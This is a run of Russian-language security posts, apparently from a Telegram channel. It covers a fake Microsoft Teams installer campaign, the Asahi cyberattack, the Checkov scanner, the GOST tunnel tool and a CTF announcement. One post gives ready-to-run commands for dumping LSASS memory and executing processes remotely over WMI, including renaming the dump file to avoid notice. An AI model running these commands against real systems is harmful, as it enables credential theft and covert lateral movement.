🎩 Компания Blackpoint выявила новую волну атак, при которой пользователи, ищущие «скачать Microsoft Teams», видят вредоносную рекламу, перенаправляющую их на поддельные веб-сайты. Пользователи переходили на "teams-install[.]top", в котором располагался вредоносный файл "MSTeamsSetup.exe"

✍️ Чтобы выглядеть как настоящие, эти поддельные установщики часто подписываются ненадёжными цифровыми сертификатами от таких эмитентов, как «4th State Oy» и «NRM NETWORK RISK MANAGEMENT INC.». Этот приём помогает обойти базовые проверки безопасности, которые выявляют неподписанное ПО.

📌 ВПО помещала в папку %APPDATA%\\Roaming зараженный DDL с именем CaptureService.dll и тем самым обеспечивала закрепление в инфраструктуре жертвы.

🔐 Данный комплекс вредоносной активности назвали бэкдор Oyster, который обеспечивал удаленный доступ и взаимодействие с C2-сервером. В ходе анализа были выявлены такие индикаторы компрометации, как nickbush24[.]com и techwisenetwork[.]com.

⚠️ Будьте внимательны и проверяйте, какие ресурсы посещаете.

Читать полностью…

🍺 Пиво в Японии - В С Ё!

🇯🇵 Хакеры остановили производство на крупнейшем пивоваренном заводе в Японии.

🏭 Крупнейший производитель пива в Японии Asahi Group заявил, что приостановил заказы и доставку продукции в стране после того, как кибератака привела к остановке его производственных операций.

❌ По данным информационного агентства, компания, выпускающая пиво Asahi Super Dry Beer и виски Nikka, а также ряд безалкогольных напитков, заявила, что не может предсказать, когда возобновится производство.

❗️ Об атаке впервые стало известно 29.09, когда компания Asahi опубликовала заявление, в котором говорилось, что операции по заказу и доставке в ее японских компаниях, а также услуги колл-центра были приостановлены «из-за сбоя системы»

😡 Группа не раскрыла возможную личность злоумышленника, но заявила, что кибератака не привела к утечке данных клиентов.

Читать полностью…

Checkov: Статический анализатор безопасности IaC

Checkov — фреймворк с открытым исходным кодом от компании Bridgecrew, предназначенный для сканирования облачной инфраструктуры, описанной в виде кода, на предмет наличия ошибок конфигурации. Он анализирует ваши шаблоны Terraform, CloudFormation, Kubernetes манифесты, конфигурации Helm и другие файлы IaC, проверяя их на соответствие сотням предопределенных политик. Эти политики основаны на практиках от облачных провайдеров (AWS, Azure, GCP) и стандартов безопасности (CIS Benchmarks).

🔜 Что умеет?
- Находит уязвимости до того, как инфраструктура будет развернута, следуя принципу «Shift Left» в безопасности.
- Поддерживает все основные облачные платформы.
- Работает с Terraform, CloudFormation, Kubernetes, ARM Templates, Dockerfile и многими другими.
- Позволяет создавать собственные пользовательские политики на простом языке Python.

🟣Установка
Самый быстрый способ — использовать менеджер пакетов pipх.

pipx install checkov

🟣Проверка

checkov -h

🟣Базовое использование
У вас есть директория с файлами Terraform (.tf). Просканируем ее:

checkov -d /path/to/your/terraform/code

Checkov рекурсивно просканирует все файлы в указанной директории, определит их тип и запустит соответствующие проверки.

🟣Сканирование конкретного файла
Проверим конкретный файл, например, манифест Kubernetes:

checkov -f deployment.yaml

🟣Интеграция в CI/CD
Сила Checkov раскрывается при его интеграции в конвейер непрерывной интеграции и доставки (CI/CD). Например, в GitHub Actions это можно сделать так:

name: "Security Scan"
on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  checkov:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run Checkov
        uses: bridgecrewio/checkov-action@master
        with:
          directory: .
          framework: terraform  #можно указать конкретный фреймворк

Это гарантирует, что каждый

Pull Request

будет автоматически проверен на соответствие стандартам безопасности.

Читать полностью…

🎣 Фишинг и социальная инженерия: психология атак и методы защиты

Почему даже лучший брандмауэр бессилен? Потому что самое слабое звено - человек.

В новой статье мы подробно рассматриваем:
🔵психологические триггеры: срочность, авторитет, взаимность, социальное доказательство
🔵отличия масс-фишинга от претекстинга
🔵практические приёмы тренировки персонала и инструмент Swaks для учебных рассылок

📌 Читайте подробнее!

#phishing #soceng #cybersecurity

Читать полностью…

Исследователи из SpecterOps продемонстрировали инструменты для извлечения памяти процесса LSASS через протокол WMI. В данной статье приведены отличные от Win32_Process классы, позволяющие достичь той же функциональности.

1️⃣MSFT_MTProcess (CreateProcess)
Наиболее близкий к Win32_Process класс WMI. Win32_Process — это канонический пример горизонтального перемещения в WMI, и именно его в основном используют для этих целей.

В MSFT_MTProcess есть метод CreateProcess, который принимает аргумент командной строки, как и Win32_Process. Однако у этого класса есть существенный недостаток: он существует только в Windows Server 2016 и более поздних версиях. Это означает, что он недоступен на рабочих станциях, но вызовет выполнение данного двоичного файла, такого как Win32_Process.

2️⃣MSFT_MTProcess (CreateDump)
Вторым интересным методом для MSFT_MTProcess является CreateDump. Если необходимо удаленно/локально создать дамп процесса без добавления каких-либо новых инструментов, то можно использовать метод CreateDump.

Этот класс использует ту же технику, что и дамп через диспетчер задач (нажатие на процесс правой кнопкой мыши и создание дампа). Это загружает dbghelpd.dll и вызывает MiniDumpWriteDump в экземпляре процесса, который ему предоставляют. Однако цепочка выполнения процесса немного отличается. Вместо того, чтобы диспетчер задач загружал библиотеку DLL, тут уже есть процесс WmiPrvSE, который завершает загрузку и выполняет вызов функции.

⛏Инструменты
⏺️WMI_Proc_Dump.py — инструмент, использующий класс MSFT_MTProcess для удалённого дампа процесса при работе с Windows Server 2016 или более поздней версией. Он вызывает MSFT_MTProcess для дампа процесса, который автоматически записывается в C:\Windows\Temp\<Process_Name>.dmp.
Однако, если пользователь захочет переименовать это во что-то менее подозрительное, это можно сделать через CIM_DataFile.

python wmi-proc-dump.py user:pass@hostname -pid 580
python wmi-proc-dump.py user:pass@hostname -proc lsass.exe
python wmi-proc-dump.py user:pass@hostname -proc lsass.exe -rename chrome-debug.dmp

⏺️mtprocess.py - второй скрипт, реализующий метод CreateProcess класса MSFT_MTProcess. Кроме того, этот скрипт позволяет автоматически установить класс MSFT_MTProcess на рабочей станции.

python mtprocess.py -exec user:pass@hostname calc.exe
python mtprocess.py -exec -cimv2 user:pass@hostname calc.exe

Читать полностью…

GOST — Простой туннель на Golang

GOST (GO Simple Tunnel) — это мощный инструмент-туннель и прокси, написанный на Go, который позволяет создавать цепочки прокси, выполнять переадресацию портов, устраивать обратные прокси и многое другое.

⚡️ Основные возможности GOST
⏺️ Поддержка множества протоколов: HTTP, HTTPS, HTTP2, SOCKS4(A), SOCKS5, Shadowsocks и др.
⏺️ Многопортовое слушание и прокси-цепочки (multi-level forward chaining)
⏺️ Переадресация TCP/UDP портов, обратный прокси, прозрачный прокси (transparent proxy)
⏺️ Поддержка туннелирования UDP поверх TCP, маршрутизация, контроль доступа, балансировка нагрузки
⏺️ Динамическая конфигурация, плагины, Web API, WebUI, GUI-клиенты


⬇️ Установка и запуск
• Скачать бинарники или собрать из исходников:

git clone https://github.com/go-gost/gost.git  
cd gost/cmd/gost  
go build

🖥 Пример использования
➡️ Простой прокси

./gost -L http://:8080

Запускает HTTP-прокси на порту 8080.

➡️ Переадресация порта TCP

gost -L tcp://:2222/192.168.1.100:22

Локальный порт 2222 направляется на SSH-порт 22 удалённой машины.

➡️ Использование цепочки проксей (proxy chain)

gost -L=:8080 -F=quic://remote:9000 -F=socks5://another:1080

Трафик сначала идёт через QUIC, затем через SOCKS5 и далее к конечной точке.

🪛 Применение и кейсы использования
➡️ Обход ограничений сети, проксирование трафика через цепочки, туннелирование.
➡️ Обратный прокси / туннельная проксификация: открытие доступа к внутренним сервисам через NAT-файрволы.
➡️ Вредоносное применение: злоумышленники используют GOST для проксирования трафика к C2-серверам.

Читать полностью…

🚩 Новые задания на платформе HackerLab!

🎢 Категория Разное — Ну кам-он!

⚙️ Категория Реверс-инжиниринг — Я работаю в криптовалюте

Приятного хакинга!

Читать полностью…